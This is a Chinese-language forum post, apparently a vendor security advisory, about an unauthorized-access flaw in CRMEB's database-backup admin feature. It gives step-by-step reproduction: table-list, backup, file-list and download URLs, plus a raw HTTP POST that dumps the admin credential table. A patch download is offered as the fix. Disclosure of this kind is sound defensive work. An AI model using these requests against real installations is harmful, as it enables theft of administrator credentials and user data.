全部
常见问题
产品动态
精选推荐

CRMEB知识付费存在未授权访问漏洞

管理 管理 编辑 删除

问题:system.system_databackup功能处存在未授权获取数据库文件,泄露数据库敏感信息

查看表名http://192.168.8.75/admin/system.system_databackup/tablelist.html例如:eb_user表和eb_system_admin表保存账号和密码
备份eb_system_admin表POST /admin/system.system_databackup/backup HTTP/1.1Host: 192.168.8.75Content-Length: 28Accept: application/json, text/javascript, */*; q=0.01Dnt: 1X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedOrigin: http://192.168.8.75Referer: http://192.168.8.75/admin/system.system_databackup/index.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8 tables%5B%5D=eb_system_admin
查看备份文件名称http://192.168.8.75/admin/system.system_databackup/filelist.html?page=1&limit=10
根据返回的“time”值下载数据库表备份文件http://192.168.8.75/admin/system.system_databackup/downloadFile/feilname/1704781013


aa948202401161512572820.png

8eab9202401161513174783.png

baa5a202401161513255567.png

62129202401161513346309.png


修复方法:下载下面文件覆盖

文件上传到根目录;如图

09402202401161514564927.png

解压文件夹即可

附件

application(0116).zip

请登录后查看

全 最后编辑于2024-01-16 15:16:18

快捷回复
回复({{post_count}}) {{!is_user ? '我的回复' :'全部回复'}}
回复从新到旧

{{item.user_info.nickname ? item.user_info.nickname : item.user_name}}

作者 管理员 企业

{{item.floor}}# 同步到gitee 已同步到gitee {{item.is_suggest==1? '取消推荐': '推荐'}}
{{item.floor}}#
{{item.user_info.title}}
附件

{{itemf.name}}

{{item.created_at}}  {{item.ip_address}}
{{item.like_count}}
{{item.showReply ? '取消回复' : '回复'}}
删除
回复
回复

{{itemc.user_info.nickname}}

{{itemc.user_name}}

作者 管理员 企业

回复 {{itemc.comment_user_info.nickname}}

附件

{{itemf.name}}

{{itemc.created_at}}   {{itemc.ip_address}}
{{itemc.like_count}}
{{itemc.showReply ? '取消回复' : '回复'}}
删除
回复
回复
查看更多
回复
回复
2488
{{like_count}}
{{collect_count}}
添加回复 ({{post_count}})

相关推荐

管理员
暂无简介

回答

1635

发布

164

经验

36166

快速安全登录

使用微信扫码登录
{{item.label}} {{item.label}} {{item.label}} 板块推荐 常见问题 产品动态 精选推荐 首页头条 首页动态 首页推荐
加精
取 消 确 定
回复
回复
问题:
问题自动获取的帖子内容,不准确时需要手动修改. [获取答案]
答案:
提交
bug 需求 取 消 确 定

微信登录/注册

切换手机号登录

{{ bind_phone ? '绑定手机' : '手机登录'}}

{{codeText}}
切换微信登录/注册
暂不绑定
CRMEB客服

CRMEB咨询热线 咨询热线

400-8888-794

微信扫码咨询

CRMEB开源商城下载 开源下载 CRMEB官方论坛 帮助文档
返回顶部 返回顶部
CRMEB客服